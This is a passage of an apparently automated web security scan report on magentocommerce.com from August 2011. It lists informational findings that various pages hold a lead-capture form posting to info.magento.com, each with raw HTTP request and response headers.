<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.108. http://www.magentocommerce.com/partners/find/solution-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/solution-partners/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/find/solution-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176347; expires=Sat, 11-Aug-2012 15:12:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Fsolution-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:27 GMT
Content-Length: 63005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.109. http://www.magentocommerce.com/partners/hosting-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/hosting-partners

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/hosting-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176331; expires=Sat, 11-Aug-2012 15:12:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fpartners%2Fhosting%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:11 GMT
Content-Length: 37154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.110. http://www.magentocommerce.com/partners/industry-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/industry-partners

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/industry-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176341; expires=Sat, 11-Aug-2012 15:12:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Findustry%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 38023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.111. http://www.magentocommerce.com/partners/solution-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/solution-partners

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/solution-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Fsolution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.112. http://www.magentocommerce.com/partners/view/117/gorilla  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/view/117/gorilla

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/view/117/gorilla HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176374; expires=Sat, 11-Aug-2012 15:12:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fpartners%2Fview%2F117%2Fgorilla%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:54 GMT
Content-Length: 57995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.113. http://www.magentocommerce.com/pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.114. http://www.magentocommerce.com/product/community-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/community-edition

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/community-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Fcommunity-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 32482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.115. http://www.magentocommerce.com/product/compare  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/compare

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/compare HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175710; expires=Sat, 11-Aug-2012 15:01:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fproduct%2Fcompare%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:50 GMT
Content-Length: 47177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.116. http://www.magentocommerce.com/product/deployed-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/deployed-solutions

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/deployed-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175705; expires=Sat, 11-Aug-2012 15:01:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:45 GMT
Content-Length: 32561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.117. http://www.magentocommerce.com/product/emerging-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/emerging-business

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/emerging-business HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_activity=1313170894; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.2.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171056; expires=Sat, 11-Aug-2012 13:44:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:16 GMT
Content-Length: 33707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.118. http://www.magentocommerce.com/product/enterprise-community-faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-community-faqs

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/enterprise-community-faqs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175681; expires=Sat, 11-Aug-2012 15:01:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproduct%2Fenterprise-community-faqs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:21 GMT
Content-Length: 42996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.119. http://www.magentocommerce.com/product/enterprise-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-edition

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175633; expires=Sat, 11-Aug-2012 15:00:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:00:33 GMT
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.120. http://www.magentocommerce.com/product/enterprise-level  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-level

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/enterprise-level HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; exp_domain=magentocommerce.com; exp_last_visit=997810832; exp_last_activity=1313170832; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.1.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; homepage_intro=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 32647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.121. http://www.magentocommerce.com/product/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/faq

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/faq HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175724; expires=Sat, 11-Aug-2012 15:02:04 GMT; path=/; domain=magentocommerce.com
